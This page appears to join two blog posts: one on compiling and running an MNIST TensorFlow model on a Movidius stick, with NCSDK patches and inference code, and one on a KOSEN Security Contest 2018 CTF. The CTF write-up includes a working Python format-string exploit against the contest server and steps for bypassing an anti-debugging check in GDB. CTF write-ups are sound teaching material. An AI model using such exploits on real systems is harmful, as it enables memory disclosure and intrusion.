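The first two causes are both preprocessing mistakes, so they can be shown in a few lines. The following is a minimal NumPy sketch, assuming a 28x28 8-bit grayscale image with a dark digit on a light background. The function name `preprocess` and the synthetic test image are made up for illustration.

```python
import numpy as np

def preprocess(gray_u8):
    """Convert a 28x28 uint8 image (dark digit, light background) to MNIST-style input."""
    inverted = 255.0 - gray_u8.astype(np.float32)  # light digit on a dark background
    scaled = inverted / 255.0                      # values in [0, 1]
    return scaled.reshape(1, 784)

# Synthetic example: a white page with a single black pixel.
page = np.full((28, 28), 255, dtype=np.uint8)
page[3, 4] = 0
x = preprocess(page)
print(x.shape, x.min(), x.max())
```

After this step the background is 0 and the digit is close to 1, which is the convention the network was trained on.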

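Conclusion (working method and source code)

I was able to solve three problems.
1. The TensorFlow model could not be compiled with mvNCCompile
-> Rewrote TensorFlowParser.py
2. mvNCCheck is supposed to load an image with the -i option, but it does not work
-> Rewrote TensorFlowParser.py and MiscIO.py to fit the model (not general-purpose)
3. The inference results were wrong
-> The input was wrong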

Patching mvNCCompile

Edit /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py around line 290 so that it checks that the array has elements before accessing it.

<                 if have_first_input(strip_tensor_id(node.outputs[0].name)):
---
>                 if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):

With this change, mvNCCompile succeeds.
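The fix relies on Python's short-circuit evaluation: when the list is empty, the right-hand side of `and` is never evaluated, so the index access cannot raise IndexError. Here is a minimal sketch of the same pattern. `is_first_input_node` and the lambda predicates are hypothetical stand-ins, not NCSDK functions.

```python
def is_first_input_node(output_names, predicate):
    # Short-circuit: if output_names is empty, output_names[0] is never evaluated.
    return bool(len(output_names) and predicate(output_names[0]))

# A node without outputs is skipped instead of raising IndexError.
print(is_first_input_node([], lambda name: True))
# A node whose first output matches is accepted.
print(is_first_input_node(["input"], lambda name: name == "input"))
```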

Patching mvNCCheck

Edit /usr/local/bin/ncsdk/Controllers/MiscIO.py around line 250.

250c250
<         greyscale = True if new_size[2] == 1 else False
---
>         greyscale = True if new_size[1] == 1 else False

Edit /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py around line 270.

265,271c265,271
<                                    [int(shape[0]),
<                                     int(shape[3]),
<                                     int(shape[1]),
<                                     int(shape[2])],
<                                    raw_scale=arguments.raw_scale,
<                                    mean=arguments.mean,
<                                    channel_swap=arguments.channel_swap)
---
>                                    [int(1),
>                                     int(1),
>                                     int(shape[0]),
>                                     int(shape[1])],
>                                    raw_scale=1,
>                                    mean=None,
>                                    channel_swap=None)
272a273
>             input_data = input_data.transpose([0, 1, 3, 2])[0][0]

With these changes,

mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../github_deep_mnist/ncappzoo/data/digit_images/one.png  -S 255

starts running. The results, however, are questionable. Should the input image be preprocessed?

Main program (for training)

from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import tempfile
def deepnn(x):
    with tf.name_scope('reshape'):
        x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1 = number of x
        
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
        
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
        
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2= bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
        
    with tf.name_scope('pool2'):
        h_pool2 = max_pool_2x2(h_conv2)
        
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
        
    with tf.name_scope('dropout'):
        keep_prob = tf.placeholder(tf.float32)
        h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
        
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        
        y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    
    return y_conv, keep_prob
def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')
def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
def weight_variable(shape):
    initial = tf.truncated_normal(shape, stddev=0.1) # random
    return tf.Variable(initial)
def bias_variable(shape):
    initial = tf.constant(0.1, shape=shape) # all 0.1
    return tf.Variable(initial)
def main():
    mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
    
    x = tf.placeholder(tf.float32, [None, 784], name='input')
    y_ = tf.placeholder(tf.float32, [None, 10])
    
    y_conv, keep_prob = deepnn(x)
    
    with tf.name_scope('loss'):
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)
    cross_entropy = tf.reduce_mean(cross_entropy)
    
    with tf.name_scope('adam_optimizer'):
        train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
    
    with tf.name_scope('accuracy'):
        correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
        correct_prediction = tf.cast(correct_prediction, tf.float32)
    accuracy = tf.reduce_mean(correct_prediction)
    
    graph_location = tempfile.mkdtemp()
    print('saving graph to: %s' % graph_location)
    train_writer = tf.summary.FileWriter(graph_location)
    train_writer.add_graph(tf.get_default_graph())
    
    saver = tf.train.Saver()
    
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        for i in range(500):
            batch = mnist.train.next_batch(50)
            if i % 10 == 0:
                train_accuracy = accuracy.eval(feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})
                print('step %d, training accuracy %g' % (i, train_accuracy))
            train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
        
        print('test accuracy %g' % accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
        
        graph_location = "."
        save_path = saver.save(sess, graph_location + "/mnist_model")
main()

For model conversion

from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import tempfile
def deepnn(x):
    with tf.name_scope('reshape'):
        x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1 = number of x
        
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
        
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
        
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2= bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
        
    with tf.name_scope('pool2'):
        h_pool2 = max_pool_2x2(h_conv2)
        
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
        
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        
        y_conv = tf.matmul(h_fc1, W_fc2) + b_fc2
    
    return y_conv
def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')
def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
def weight_variable(shape):
    initial = tf.truncated_normal(shape, stddev=0.1) # random
    return tf.Variable(initial)
def bias_variable(shape):
    initial = tf.constant(0.1, shape=shape) # all 0.1
    return tf.Variable(initial)
def main():
    x = tf.placeholder(tf.float32, [None, 784], name='input')

    y_conv = deepnn(x)
    output = tf.nn.softmax(y_conv, name='output')
    
    saver = tf.train.Saver()
    
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        sess.run(tf.local_variables_initializer())
        
        saver.restore(sess, '.' + '/output/mnist_model')
        saver.save(sess, '.' + '/output/mnist_inference')
main()

Compile

mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph

If the input and output nodes are named input and output, -in and -on may not be needed.

Inference on Movidius

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = './JPEGImages/pickup/'
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start predicting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./output/mnist_inference.graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.bitwise_not(image)
        image = cv2.resize(image, (28, 28))
        img_list.append(image)
    img_list = np.asarray(img_list)[:10] * (1.0/255.0)
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))

2018-09-04

KOSEN Security Contest 2018 Write-Up

I am writing this write-up in English for a friend who has just started CTF. English is not my strong suit, so please bear with me.

KOSEN Security Contest 2018 was held from September 1st to 2nd. It's a CTF for Kosen students.

I entered the contest with a member of my laboratory and my juniors. Our team name was 074m4K053n, and we finished in 3rd place (3rd of 36 teams).

f:id:tokunn:20180903215121p:plain

I solved the following questions.

[Sample] 100 Sample
[Binary] 100 printf
[Binary] 200 XOR, XOR
[Binary] 250 Simple anti debugger
[Network] 150 Login and Get flag
[Web] 100 Steal a information from Server
[Web] 300 Steal a account
[Misc] 50 I don't wanna see HITO OOSUGI
[Misc] 100 No disc space

f:id:tokunn:20180903220349p:plain

I'll explain these questions below.

00 [Sample] 100 Sample

f:id:tokunn:20180903222520p:plain

[Question]

CTF is a competition in which you find answers called "flags".

The flag format is SCKOSEN{foobar}.

For practice, submit the current Japanese era as the flag.

example :

SHOWA (1926 - 1989) -> SCKOSEN{SHOWA}

MEIJI (1868 - 1912 ) -> SCKOSEN{MEIJI}

TAISHO (1912 - 1926) -> SCKOSEN{TAISHO}

[Solution]

This is a sample question.

The current Japanese era is Heisei (1989 - 2019).

So, the flag is SCKOSEN{HEISEI}.

03 [Binary] 100 printf

f:id:tokunn:20180903224338p:plain

[Question]

Steal a flag !

How to connect to game : nc [foobar] [port] example: nc 27.133.152.42 80

[Solution]

Run the sample command and you get the following output.

$ nc 27.133.152.42 80

Secret is in 0xffc9a37e

What do you want:

Type "Earth" and you get the following output.

$ nc 27.133.152.42 80

the secret is in 0xffc9a37e

what do you want: Earth

there is no Earth

Type "AAAA" followed by twenty ",%p" and get

the secret is in 0xff985c6e
what do you want: AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c,0x252c7025,0x70252c70,0x2c70252c,0x252c7025

As the result shows, %p leaks several values from memory, so a format string attack is possible.

Let's look at the result again:

AAAA,

0x100,

0xf7ed65c0,

(nil),

(nil),

(nil),

(nil),

0x43530000,

0x45534f4b,

0x73757b4e,

0x72705f65,

0x66746e69,

0x726f635f,

0x74636572,

0x7d796c,

0x41414141,

We can find 0x41414141 ("AAAA" written in ASCII) at the 15th position. This 0x41414141 is the string I sent.
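The position can also be checked offline. The following is a minimal Python 3 sketch, separate from the exploit script, that parses the values copied from the output above, finds the 1-based position of 0x41414141, and unpacks the words in between. It assumes each %p value is a 4-byte little-endian word.

```python
import struct

# Values copied from the leak above, up to and including 0x41414141.
leak = ("0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,"
        "0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,"
        "0x41414141")
words = [0 if tok == "(nil)" else int(tok, 16) for tok in leak.split(",")]

# 1-based argument position of our own input on the stack.
offset = words.index(0x41414141) + 1

# Words 7 to 14 sit right before our input; unpack them as little-endian bytes.
raw = b"".join(struct.pack("<I", w) for w in words[6:14])
text = raw.replace(b"\x00", b"").decode("ascii")

print(offset, text)  # 15 SCKOSEN{use_printf_correctly}
```

In this particular leak the flag bytes happen to be on the stack already, so the decoded text gives a way to cross-check the result of the attack.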

So, if we send an address instead of "AAAA", we can read the value stored at that address.

Attack string :

{secret address}, %15$s

We can get {secret address} from "the secret is in 0xff985c6e"
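As a small Python 3 sketch of these two steps (the helper names `parse_secret_address` and `build_payload` are made up for illustration, and a 32-bit little-endian target is assumed), the address can be pulled out of the banner and packed in front of the format specifier:

```python
import struct

def parse_secret_address(banner):
    """Extract the hex address from text such as 'the secret is in 0xff985c6e'."""
    for token in banner.split():
        if token.startswith("0x"):
            return int(token, 16)
    raise ValueError("no address found in banner")

def build_payload(addr, offset=15):
    # 4-byte little-endian address first, then %<offset>$s to dereference it.
    return struct.pack("<I", addr) + ",%{}$s\n".format(offset).encode("ascii")

addr = parse_secret_address("the secret is in 0xff985c6e\nwhat do you want: ")
payload = build_payload(addr)
print(hex(addr), payload)
```

Note that this simple form would break if the address contained a null byte or a newline, since the input is read as a string.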

The Python script is here:

#!/usr/bin/env python2

import socket

import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('27.133.152.42', 80))

res = s.recv(4096)

res += s.recv(4096)

print(res)

addr = int(res.split()[4],16)

#buf = "AAAA"

buf = struct.pack("<I", addr)

#buf += ',%p' * 20

buf += ',%15$s'

buf += '\n'

s.send(buf)

print(buf)

res = s.recv(4096)

res += s.recv(4096)

res += s.recv(4096)

print(res)

s.close()

The result is here:

the secret is in 0xffc0b52e
what do you want:
.��,%15$s

there is no .��,SCKOSEN{use_printf_correctly}

04 [Binary] 200 XOR, XOR

f:id:tokunn:20180904084954p:plain

[Question]

Read assembly and get flag !

[Solution]

We are given a file named "asmreading".

First, check the file with the file command:

$ file ./asmreading

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's an ELF executable.

Next, open it in GDB and disassemble the main function.

f:id:tokunn:20180904182441p:plain

We can see ASCII codes and a call to xor_func, so xor_func seems to be a decoding function.

To check that, set a breakpoint right after the call to xor_func and run the executable.

f:id:tokunn:20180904182731p:plain

Then we can find the decoded flag.

The flag is SCKOSEN{you_can_read_assembly}. (But I didn't read the assembly ...)
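For readers who do want to follow what such a function does, here is a minimal Python 3 sketch of single-byte XOR decoding. The key and the data are placeholders: the actual key and encoded bytes in asmreading were not recorded here, and the real xor_func may work differently.

```python
def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)

KEY = 0x2A  # hypothetical key, not taken from the challenge binary

# Placeholder plaintext, not the real flag.
encoded = xor_bytes(b"SCKOSEN{example}", KEY)

# XOR is its own inverse, so applying the same key again decodes the data.
decoded = xor_bytes(encoded, KEY)
print(decoded)
```

Because XOR with the same key undoes itself, a binary that stores XOR-encoded bytes must decode them at run time, which is why a breakpoint after the call reveals the plaintext.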

05 [Binary] 250 Simple anti debugger

f:id:tokunn:20180904183010p:plain

[Question]

I attached it from GDB, but it doesn't work.

How can I analyse it ?

[Solution]

We are given a file named "simple_anti_debugger".

First, check the file with the file command:

$ file ./simple_anti_debugger

simple_anti_debugger: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's an ELF executable.

Next, use GDB. However, I couldn't run the binary under the debugger because of an anti-debugging technique.

So first, look at the function list. There is a detect_debugger function. Let's try to get around it.

f:id:tokunn:20180904203950p:plain

In the detect_debugger function, the eax register is compared with 0xffffff. If eax is 0xffffff, the program jumps to the exit code.

To avoid that, I change the value in eax.

f:id:tokunn:20180904204003p:plain

Now we can use the debugger in the main function.

f:id:tokunn:20180904204019p:plain

Change eax again to bypass the password check.

f:id:tokunn:20180904204028p:plain

Then we get the flag. The flag is SCKOSEN{I_like_debugger}.

I'll write up the other questions later.....

*1: '27.133.152.42', 80